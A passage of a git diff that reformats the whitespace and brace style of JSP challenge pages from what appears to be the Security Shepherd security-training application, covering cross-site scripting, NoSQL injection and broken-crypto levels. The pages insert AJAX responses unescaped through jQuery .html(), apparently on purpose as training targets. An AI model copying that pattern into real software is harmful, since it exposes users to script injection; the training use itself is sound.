 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= LevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= LevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto1.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto1.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.jsp b/src/main/webapp/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.jsp
index 025e49356..565890496 100644
--- a/src/main/webapp/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.jsp
+++ b/src/main/webapp/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.jsp
@@ -1,141 +1,150 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Scripting Challenge 6
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = new String("Cross Site Scripting Six");
-    String levelHash = "d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf";
+/**
+ * Cross Site Scripting Challenge 6
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+ *
+ * @author Mark Denihan
+ */
+String levelName = new String("Cross Site Scripting Six");
+String levelHash = "d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+String translatedLevelName = bundle.getString("challenge.challengeName");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= Encode.forHtml(translatedLevelName) %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm"
-                           autocomplete="off" type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.makePost") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= Encode.forHtml(translatedLevelName) %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm"
+						autocomplete="off" type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.makePost") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.jsp b/src/main/webapp/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.jsp
index 990471984..1ec1f6343 100644
--- a/src/main/webapp/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.jsp
+++ b/src/main/webapp/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66.jsp
@@ -1,151 +1,159 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    String levelName = "NoSQL Injection Challange One";
-    String levelHash = "d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66";
+String levelName = "NoSQL Injection Challange One";
+String levelHash = "d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66";
 
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Paul McCann
  */
 
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 
-    String i18nLevelName = bundle.getString("challenge.challengeName");
-    String levelBlurb = bundle.getString("challenge.description");
+String i18nLevelName = bundle.getString("challenge.challengeName");
+String levelBlurb = bundle.getString("challenge.description");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= levelBlurb %>
-        <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.para2") %>
-                </td>
-            </tr>
-            <tr>
-                <td></td>
-            </tr>
-            <tr>
-                <td></td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="theGamerName"
-                           type="hidden"
-                           value="b43c05a8166b5bbc5e2baebbbc84a71f83fd7cac01dd5d23bb6e003a95d60b7c"/>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit" value="Get Gamer Info"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= levelBlurb %>
+			<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.para2") %></td>
+				</tr>
+				<tr>
+					<td></td>
+				</tr>
+				<tr>
+					<td></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="theGamerName"
+						type="hidden"
+						value="b43c05a8166b5bbc5e2baebbbc84a71f83fd7cac01dd5d23bb6e003a95d60b7c" />
+					</td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit" value="Get Gamer Info" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
+		<div id="resultsDiv"></div>
 
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<script>
-    $("#leForm").submit(function () {
-        $("#userContent").text($("#theGamerName").val());
-        var theGamer = $("#theGamerName").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66",
-                data: {
-                    theGamerName: theGamer
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
+	<script>
+			$("#leForm").submit(function(){
+				$("#userContent").text($("#theGamerName").val());
+				var theGamer = $("#theGamerName").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66",
+						data: {
+							theGamerName: theGamer
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
 
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.jsp b/src/main/webapp/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.jsp
index b80eea223..c19f7d983 100644
--- a/src/main/webapp/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.jsp
+++ b/src/main/webapp/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.jsp
@@ -1,146 +1,155 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Scripting Challenge 1
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Cross Site Scripting Challenge 1
+ * 
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
 
-    String levelName = new String("Cross Site Scripting 1");
-    String levelHash = new String("d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa");
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String levelName = new String("Cross Site Scripting 1");
+ String levelHash = new String("d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("challenge.challengeName");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getUser") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getUser") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
